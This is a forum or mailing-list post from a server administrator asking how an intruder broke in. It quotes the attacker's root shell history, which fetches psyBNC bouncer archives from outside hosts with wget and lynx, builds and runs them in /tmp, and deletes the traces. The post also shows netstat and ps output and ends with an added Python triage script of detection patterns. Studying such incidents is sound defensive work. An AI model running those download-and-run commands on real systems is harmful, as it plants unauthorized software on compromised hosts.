Hello, many thanks to everyone who understood my desperation. It is very hard to convince the "owners" of the network to release a subdomain to you! And they are right! The openings for intrusion are amplified in these cases! Hence my desperation to solve this here, on the list!

Well, checking /var/log, I saw that there are zillions of files there. I presume the guy in question did not delete anything! I also saw that the guy ran the following commands, per root's .bash_history:

    uname -a
    uname -a
    passwd root
    uptime
    /sbin/ifconfig
    uname -a
    cd /tmp
    wget http://xpl.netmisphere2.com/psyBNC2.3.2-4.tar.tar
    lynx -source http://xpl.netmisphere2.com/psyBNC2.3.2-4.tar.tar > psyBNC2.3.2-4.tar.tar
    tar -zxvf psyBNC2.3.2-4.tar.tar
    cd psybnc
    ls
    make
    makefile
    ./psybnc
    chmod 777 psybnc
    cd psybnc[
    cd psybnc
    cd /tmp
    ls
    cd psybnc
    make;pico psybnc.conf;./psybnc
    ./psybnc
    ls
    cd /tmp
    ls
    rm -vr psyBNC2.3.2-4.tar.tar
    rm -vr psybnc
    ls
    wget http://geocities.com/bogdanul_16/LinuZ/psybnc.tgz
    lynx -source http://geocities.com/bogdanul_16/LinuZ/psybnc.tgz > psybnc.tgz
    tar -zxvf psybnc.tgz
    cd psybnc
    ls
    make
    pico psybnc.conf
    vi psybnc.conf
    ./psybnc
    /sbin/ifconfig
    cd /tmp;wget http://www.psychoid.lam3rz.de/psyBNC2.3.2-4.tar.gz;
    lynx -source http://www.psychoid.lam3rz.de/psyBNC2.3.2-4.tar.gz > psyBNC2.3.2-4.tar.gz
    ls
    rm -vr psyBNC2.3.2-4.tar.gz
    rm -vr psybnc
    ls
    rm -vr psybnc.tgz
    killall -9 psybnc
    ls
    ps -aux
    killall -9 psybnc
    cd /va/tmp
    cd /tmp
    cd /var/tmp
    lynx -source http://www.psychoid.lam3rz.de/psyBNC2.3.2-4.tar.gz > psyBNC2.3.2-4.tar.gz
    /sbin/ifconfig
    id
    cd /tmp
    lynx -source http://xpl.netmisphere2.com/psybnc.tar.tar > psybnc.tar.tar
    tar -zxvf psybnc.tar.tar
    cd ...
    ./run "dev"
    ./uptime
    uname -a
    /sbin/ifconfig
    ps -aux
    killall -9 bindz
    killall -9 r0nin

Besides that, the command netstat -pantu shows:

    Active Internet connections (servers and established)
    Proto Recv-Q Send-Q Local Address      Foreign Address  State   PID/Program name
    tcp        0      0 0.0.0.0:37         0.0.0.0:*        LISTEN  355/inetd
    tcp        0      0 0.0.0.0:9          0.0.0.0:*        LISTEN  355/inetd
    tcp        0      0 127.0.0.1:3306     0.0.0.0:*        LISTEN  416/mysqld
    tcp        0      0 0.0.0.0:13         0.0.0.0:*        LISTEN  355/inetd
    tcp        0      0 0.0.0.0:80         0.0.0.0:*        LISTEN  590/apache
    tcp        0      0 0.0.0.0:22         0.0.0.0:*        LISTEN  576/sshd
    tcp        0      0 0.0.0.0:25         0.0.0.0:*        LISTEN  551/master
    udp        0      0 0.0.0.0:9          0.0.0.0:*                355/inetd

Another thing would be the command ps aux, which shows:

    USER       PID %CPU %MEM   VSZ  RSS TTY  STAT START TIME COMMAND
    root         1  0.1  1.3  1492  484 ?    S    17:43 0:05 init [2]
    root         2  0.0  0.0     0    0 ?    S    17:43 0:00 [keventd]
    root         3  0.0  0.0     0    0 ?    SN   17:43 0:00 [ksoftirqd_CPU0]
    root         4  0.0  0.0     0    0 ?    S    17:43 0:00 [kswapd]
    root         5  0.0  0.0     0    0 ?    S    17:43 0:00 [bdflush]
    root         6  0.0  0.0     0    0 ?    S    17:43 0:00 [kupdated]
    root         7  0.0  0.0     0    0 ?    S    17:43 0:00 [i2oevtd]
    root         9  0.0  0.0     0    0 ?    S    17:43 0:00 [kreiserfsd]
    root       342  0.0  1.6  1544  588 ?    Ss   17:45 0:01 /sbin/syslogd
    root       345  0.0  1.3  2216  504 ?    Ss   17:45 0:01 /sbin/klogd
    root       355  0.0  1.2  1520  456 ?    Ss   17:45 0:00 /usr/sbin/inetd
    root       370  0.0  2.8  2496 1044 ?    S    17:45 0:00 /bin/sh /usr/bin/mysqld_safe
    root       415  0.0  2.8  2496 1048 ?    S    17:45 0:00 /bin/sh /usr/bin/mysqld_safe
    mysql      416  0.0 15.8 73584 5736 ?    S    17:45 0:01 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock
    root       417  0.0  1.3  1476  488 ?    S    17:45 0:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
    mysql      420  0.0 15.8 73584 5736 ?    S    17:45 0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock
    mysql      421  0.0 15.8 73584 5736 ?    S    17:45 0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock
    mysql      422  0.0 15.8 73584 5736 ?    S    17:45 0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock
    mysql      423  0.0 15.8 73584 5736 ?    S    17:45 0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock
    mysql      424  0.0 15.8 73584 5736 ?    S    17:45 0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock
    mysql      425  0.0 15.8 73584 5736 ?    S    17:45 0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock
    mysql      426  0.0 15.8 73584 5736 ?    S    17:45 0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock
    mysql      427  0.0 15.8 73584 5736 ?    S    17:45 0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock
    mysql      428  0.0 15.8 73584 5736 ?    S    17:45 0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock
    root       551  0.0  3.1  2956 1140 ?    Ss   17:45 0:00 /usr/lib/postfix/master
    postfix    556  0.0  3.0  2964 1096 ?    S    17:45 0:00 pickup -l -t fifo -u -c
    postfix    557  0.0  3.3  2996 1208 ?    S    17:45 0:00 qmgr -l -t fifo -u -c
    root       566  0.0  4.3  6736 1588 ?    Ss   17:45 0:00 /usr/sbin/saslauthd -a pam
    root       567  0.0  4.3  6736 1588 ?    S    17:45 0:00 /usr/sbin/saslauthd -a pam
    root       568  0.0  4.3  6736 1588 ?    S    17:45 0:00 /usr/sbin/saslauthd -a pam
    root       569  0.0  4.3  6736 1588 ?    S    17:45 0:00 /usr/sbin/saslauthd -a pam
    root       570  0.0  4.3  6736 1588 ?    S    17:45 0:00 /usr/sbin/saslauthd -a pam
    root       576  0.0  3.8  3648 1380 ?    Ss   17:45 0:00 /usr/sbin/sshd
    daemon     580  0.0  1.6  1672  616 ?    Ss   17:45 0:00 /usr/sbin/atd
    root       583  0.0  2.2  1756  820 ?    Ss   17:45 0:00 /usr/sbin/cron
    root       590  0.0 13.2 13096 4812 ?    S    17:45 0:00 /usr/sbin/apache
    root       596  0.0  4.7  4112 1708 tty1 Ss   17:45 0:01 -bash
    root       597  0.0  1.3  1484  476 tty2 Ss+  17:45 0:00 /sbin/getty 38400 tty2
    root       598  0.0  1.3  1484  476 tty3 Ss+  17:45 0:00 /sbin/getty 38400 tty3
    root       599  0.0  1.3  1484  476 tty4 Ss+  17:45 0:00 /sbin/getty 38400 tty4
    root       600  0.0  1.3  1484  476 tty5 Ss+  17:45 0:00 /sbin/getty 38400 tty5
    root       601  0.0  1.3  1484  476 tty6 Ss+  17:45 0:00 /sbin/getty 38400 tty6
    www-data   602  0.0  9.3 13096 3380 ?    S    17:45 0:00 /usr/sbin/apache
    www-data   603  0.0  9.3 13096 3380 ?    S    17:45 0:00 /usr/sbin/apache
    www-data   604  0.0  9.3 13096 3380 ?    S    17:45 0:00 /usr/sbin/apache
    www-data   605  0.0  9.3 13096 3380 ?    S    17:45 0:00 /usr/sbin/apache
    www-data   606  0.0  9.3 13096 3380 ?    S    17:45 0:00 /usr/sbin/apache
    root       921  0.0  2.3  2480  864 tty1 R+   19:03 0:00 ps aux

I turned Google upside down and saw that this y2kupdate is something to do with IRC! But I would like to know how to find out how he got in. Because this psyBNC is something like an IRC script, but I did not see the egg running. Could someone who has lived through or witnessed something similar show me the ropes for cleaning my system and protecting myself, without reformatting the system? In principle the logs are all there, and he did not rm everything!!!!

Thanks
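As an added example (not part of the original post, and not the poster's own tooling), here is a small Python triage script that does the two checks the post performs by eye: it tags the download / unpack / build / run / cleanup stages in a copy of root's .bash_history, and it parses `netstat -pantu` output to list listeners that are not on an allowlist of expected services. The sample history and netstat lines are constructed from what the post quotes; the 31337/psybnc listener is a hypothetical addition (the post's own netstat showed no bouncer listening), and the allowlist assumes sshd, postfix master, apache and mysqld are the legitimate services on this host.

```python
"""Triage helper for a hand-driven psyBNC-style intrusion (added example).

Flags the classic download/unpack/build/run/cleanup sequence in a shell
history and lists unexpected listening sockets from netstat output.
Sample data below is constructed; the 31337/psybnc line is hypothetical.
"""
import re
from collections import Counter

# Constructed sample: a subset of root's .bash_history as quoted in the post.
SAMPLE_HISTORY = """uname -a
passwd root
cd /tmp
wget http://xpl.netmisphere2.com/psyBNC2.3.2-4.tar.tar
tar -zxvf psyBNC2.3.2-4.tar.tar
cd psybnc
make
chmod 777 psybnc
./psybnc
rm -vr psyBNC2.3.2-4.tar.tar
lynx -source http://geocities.com/bogdanul_16/LinuZ/psybnc.tgz > psybnc.tgz
killall -9 psybnc
killall -9 bindz
killall -9 r0nin
ls
"""

# Constructed sample in `netstat -pantu` layout; 31337/psybnc is an assumption.
SAMPLE_NETSTAT = """Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:37 0.0.0.0:* LISTEN 355/inetd
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN 416/mysqld
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 590/apache
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN 576/sshd
tcp 0 0 0.0.0.0:31337 0.0.0.0:* LISTEN 1234/psybnc
udp 0 0 0.0.0.0:9 0.0.0.0:* 355/inetd
"""

# Each rule tags one stage of the intrusion visible in the history.
HISTORY_RULES = [
    ("download", re.compile(r"\b(wget|curl|lynx\s+-source|ftp)\b.*https?://")),
    ("staging-dir", re.compile(r"\bcd\s+/(var/)?tmp\b")),
    ("unpack", re.compile(r"\btar\s+-?[a-zA-Z]*x")),
    ("build", re.compile(r"^\s*make\b")),
    ("world-writable", re.compile(r"\bchmod\s+[0-7]*777\b")),
    ("password-change", re.compile(r"\bpasswd\b")),
    ("cleanup", re.compile(r"\brm\s+-[a-zA-Z]*r")),
    ("kill-tools", re.compile(r"\bkillall\s+-9\b")),
]

# Tool names that appear in the post's history (bouncer, bindz, r0nin).
KNOWN_BAD_NAMES = {"psybnc", "bindz", "r0nin"}

# Assumed-legitimate services, taken from the post's netstat/ps output.
EXPECTED_LISTENERS = {
    ("tcp", 22, "sshd"), ("tcp", 25, "master"),
    ("tcp", 80, "apache"), ("tcp", 3306, "mysqld"),
}


def scan_history(text):
    """Return [(line_no, tag, command)] for every history line matching a rule."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        cmd = line.strip()
        if not cmd:
            continue
        for tag, rx in HISTORY_RULES:
            if rx.search(cmd):
                hits.append((n, tag, cmd))
        for name in KNOWN_BAD_NAMES:
            if re.search(r"\b%s\b" % re.escape(name), cmd):
                hits.append((n, "known-bad-name", cmd))
    return hits


def stage_summary(hits):
    """Count hits per tag; download+unpack+build+run+cleanup together is the
    signature of someone installing a bouncer by hand."""
    return Counter(tag for _, tag, _ in hits)


def unexpected_listeners(netstat_text):
    """Parse netstat -pantu lines; return (proto, port, program) not allowlisted.
    UDP lines have no State column, so PID/Program is read from the line end."""
    found = []
    for line in netstat_text.splitlines():
        parts = line.split()
        if len(parts) < 6 or not parts[0].startswith(("tcp", "udp")):
            continue
        proto = parts[0][:3]
        port = int(parts[3].rsplit(":", 1)[1])
        pid_prog = parts[-1]
        prog = pid_prog.split("/", 1)[1] if "/" in pid_prog else pid_prog
        if (proto, port, prog) not in EXPECTED_LISTENERS:
            found.append((proto, port, prog))
    return found


if __name__ == "__main__":
    hits = scan_history(SAMPLE_HISTORY)
    for n, tag, cmd in hits:
        print("history line %d [%s]: %s" % (n, tag, cmd))
    print("stages:", dict(stage_summary(hits)))
    for proto, port, prog in unexpected_listeners(SAMPLE_NETSTAT):
        print("unexpected listener: %s/%d %s" % (proto, port, prog))
```

Two caveats for anyone using this on a real box: the attacker in the post already had a root shell, so .bash_history, netstat and ps are only as trustworthy as the binaries and kernel they run on, and the script is a triage aid over whatever data you managed to copy off the host, not proof that the system is clean. Also note that the inetd time/daytime/discard listeners (ports 37, 13, 9) get flagged here not because they are the intrusion but because they are legacy services that should not be exposed on a server at all.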

